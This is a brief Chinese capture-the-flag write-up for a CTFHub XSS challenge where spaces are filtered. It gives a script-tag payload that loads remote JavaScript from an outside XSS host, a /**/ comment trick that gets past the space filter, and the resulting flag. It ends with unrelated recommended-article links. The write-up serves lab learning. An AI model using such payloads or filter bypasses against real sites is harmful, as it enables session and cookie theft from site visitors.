CTFHUB技能树之XSS——过滤空格

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题


在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理


用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
爱编程的鱼3 分钟前
C# 数据类型||C# 类型转换
java·算法·c#
一键三联啊3 分钟前
ArrayList的subList的数据仍是集合
java·开发语言
liuyang___5 分钟前
分享一下这几天在公司学到的东西
前端
rocky1916 分钟前
谷歌浏览器插件 录制菜单路由跳转行为 事件重复解决方案
前端·javascript
佳腾_10 分钟前
【web服务_负载均衡Nginx】一、Nginx 基础与核心概念解析
前端·nginx·负载均衡
前鼻音太阳熊10 分钟前
【Spring Boot 应用开发】-06 自动配置-生成配置元数据
java·spring boot·后端
purrrew10 分钟前
【数据结构_8】栈和队列
java·开发语言·数据结构
汤永红13 分钟前
windows下git bash安装SDKMan报错Looking for unzip...Not found
java·git·sdkman
风中飘爻16 分钟前
MySQL入门:数据操作CURD
前端·bootstrap·html
rocky19124 分钟前
谷歌浏览器插件 录制元素拖动事件
前端·javascript